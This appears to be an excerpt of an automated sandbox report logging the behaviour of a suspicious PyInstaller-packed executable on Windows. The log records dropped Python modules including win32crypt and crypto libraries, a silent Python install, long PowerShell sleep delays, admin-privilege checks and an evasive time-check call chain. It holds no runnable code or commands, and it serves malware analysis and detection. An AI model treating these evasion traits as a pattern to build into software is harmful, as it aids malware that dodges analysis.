Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4051Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2826Jump to behavior
Source: C:\Windows\System32\conhost.exeWindow / User API: threadDelayed 1529Jump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65002\charset_normalizer\md__mypyc.cp312-win_amd64.pydJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\Python311\DLLs\unicodedata.pydJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65002\_ssl.pydJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65002\_lzma.pydJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto\Hash\_ghash_portable.pydJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\Python311\DLLs\_multiprocessing.pydJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65002\pywin32_system32\pythoncom312.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\Python311\DLLs\_socket.pydJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\Python311\DLLs\_elementtree.pydJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto\Cipher\_raw_ocb.pydJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\Python311\DLLs\_hashlib.pydJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\Python311\DLLs\_msi.pydJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65002\pywin32_system32\pywintypes312.dllJump to dropped file
Source: C:\Windows\Temp\{8525A9B8-FAAD-4C71-B074-F663031D8BEE}\.cr\tmpaf99aaqq.exeDropped PE file which has not been started: C:\Windows\Temp\{32AE44B6-4843-42E0-AC9F-223BDA72F352}\.ba\PythonBA.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\Python311\DLLs\_uuid.pydJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65002\_asyncio.pydJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto\Cipher\_raw_des3.pydJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65002\_ctypes.pydJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto\Cipher\_raw_cbc.pydJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\Python311\Lib\venv\scripts\nt\python.exeJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65002\win32\_win32sysloader.pydJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto\Hash\_poly1305.pydJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto\Cipher\_chacha20.pydJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto\PublicKey\_x25519.pydJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto\Hash\_BLAKE2b.pydJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto\Hash\_SHA384.pydJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto\Cipher\_raw_blowfish.pydJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65002\pyexpat.pydJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto\PublicKey\_ec_ws.pydJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\Python311\DLLs\_bz2.pydJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto\Cipher\_raw_ofb.pydJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\Python311\DLLs\pyexpat.pydJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto\Hash\_MD2.pydJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65002\_queue.pydJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\Python311\DLLs\_queue.pydJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65002\charset_normalizer\md.cp312-win_amd64.pydJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65002\_cffi_backend.cp312-win_amd64.pydJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65002\_bz2.pydJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto\Cipher\_raw_eksblowfish.pydJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto\Hash\_SHA256.pydJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto\Hash\_SHA224.pydJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto\Cipher\_raw_cfb.pydJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto\Hash\_SHA512.pydJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65002\win32\win32crypt.pydJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto\Hash\_MD4.pydJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65002\_hashlib.pydJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65002\_overlapped.pydJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\Python311\DLLs\_decimal.pydJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto\Util\_cpuid_c.pydJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65002\_socket.pydJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto\Hash\_MD5.pydJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\Python311\DLLs\winsound.pydJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65002\select.pydJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto\Cipher\_raw_aes.pydJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65002\Pythonwin\win32ui.pydJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto\Hash\_SHA1.pydJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\Python311\Lib\venv\scripts\nt\pythonw.exeJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65002\python312.dllJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto\Util\_strxor.pydJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65002\python3.dllJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto\Cipher\_raw_des.pydJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto\Cipher\_raw_arc2.pydJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\Python311\DLLs\_zoneinfo.pydJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto\Cipher\_raw_ecb.pydJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\Python311\DLLs\_ssl.pydJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\Python311\DLLs\_sqlite3.pydJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto\Protocol\_scrypt.pydJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\Python311\DLLs\libcrypto-1_1.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\Python311\DLLs\_lzma.pydJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65002\_wmi.pydJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto\Cipher\_pkcs1_decode.pydJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto\Hash\_keccak.pydJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\Python311\DLLs\_overlapped.pydJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\Python311\DLLs\_ctypes.pydJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65002\cryptography\hazmat\bindings\_rust.pydJump to dropped file
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\{3924CCB2-4D94-4EC4-A7EF-4C83FEEBF7C7}\.ba\PythonBA.dllJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65002\Pythonwin\mfc140u.dllJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto\Cipher\_Salsa20.pydJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65002\_decimal.pydJump to dropped file
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\{0A1148D0-6B5F-43A6-B19B-31E0405F20B5}\.ba\PythonBA.dllJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65002\win32\win32trace.pydJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\Python311\DLLs\sqlite3.dllJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto\Cipher\_raw_cast.pydJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\Python311\DLLs\libssl-1_1.dllJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto\Hash\_RIPEMD160.pydJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto\PublicKey\_ed448.pydJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto\Math\_modexp.pydJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\Python311\DLLs\_asyncio.pydJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto\Hash\_BLAKE2s.pydJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto\Cipher\_raw_ctr.pydJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto\Cipher\_ARC4.pydJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65002\_multiprocessing.pydJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto\Cipher\_raw_aesni.pydJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\Python311\DLLs\select.pydJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65002\unicodedata.pydJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto\Hash\_ghash_clmul.pydJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65002\win32\win32api.pydJump to dropped file
Source: C:\Users\user\Desktop\3Af7PybsUi.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto\PublicKey\_ed25519.pydJump to dropped file
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeEvasive API call chain: GetLocalTime,DecisionNodes
Source: C:\Users\user\Desktop\3Af7PybsUi.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-17206
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6068Thread sleep count: 4051 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6068Thread sleep count: 2826 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5932Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6012Thread sleep time: -1844674407370954s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2436Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6912Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6904Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\SrTasks.exe TID: 7148Thread sleep time: -80000s >= -30000s
Source: C:\Windows\System32\SrTasks.exe TID: 4504Thread sleep time: -40000s >= -30000s
Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
Source: C:\Users\user\Desktop\3Af7PybsUi.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Architecture FROM Win32_Processor
Source: C:\Windows\System32\SrTasks.exeLast function: Thread delayed
Source: C:\Windows\System32\SrTasks.exeLast function: Thread delayed
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeCode function: 23_2_004C02DD GetLocalTime followed by cmp: cmp dword ptr [ebp+08h], 05h and CTI: je 004C0378h23_2_004C02DD
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeCode function: 23_2_004C02DD GetLocalTime followed by cmp: cmp dword ptr [ebp+08h], 01h and CTI: je 004C0371h23_2_004C02DD
Source: C:\Windows\Temp\{32AE44B6-4843-42E0-AC9F-223BDA72F352}\.be\python-3.11.0-amd64.exeFile Volume queried: C:\Windows FullSizeInformationJump to behavior
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\3Af7PybsUi.exeCode function: 0_2_00007FF7262985A0 FindFirstFileExW,FindClose,0_2_00007FF7262985A0
Source: C:\Users\user\Desktop\3Af7PybsUi.exeCode function: 0_2_00007FF7262979B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00007FF7262979B0
Source: C:\Users\user\Desktop\3Af7PybsUi.exeCode function: 0_2_00007FF7262B0B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF7262B0B84
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeCode function: 23_2_004B7857 FindFirstFileExW,23_2_004B7857
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeCode function: 23_2_004C488B FindFirstFileW,FindClose,23_2_004C488B
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeCode function: 23_2_00499B24 FindFirstFileW,lstrlenW,FindNextFileW,FindClose,23_2_00499B24
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeCode function: 23_2_00483D89 GetFileAttributesW,GetLastError,GetLastError,SetFileAttributesW,GetLastError,GetTempPathW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,DeleteFileW,GetTempFileNameW,MoveFileExW,MoveFileExW,MoveFileExW,FindNextFileW,GetLastError,GetLastError,GetLastError,GetLastError,RemoveDirectoryW,GetLastError,MoveFileExW,GetLastError,FindClose,23_2_00483D89
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeCode function: 23_2_004C9B11 VirtualQuery,GetSystemInfo,23_2_004C9B11
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\Temp\{32AE44B6-4843-42E0-AC9F-223BDA72F352}\.be\python-3.11.0-amd64.exeFile opened: C:\ProgramData\Package Cache\{0025DD72-A959-45B5-A0A3-7EFEB15A8050}v14.36.32532\NULLJump to behavior
Source: C:\Windows\Temp\{32AE44B6-4843-42E0-AC9F-223BDA72F352}\.be\python-3.11.0-amd64.exeFile opened: C:\ProgramData\Package Cache\{0025DD72-A959-45B5-A0A3-7EFEB15A8050}v14.36.32532\packagesJump to behavior
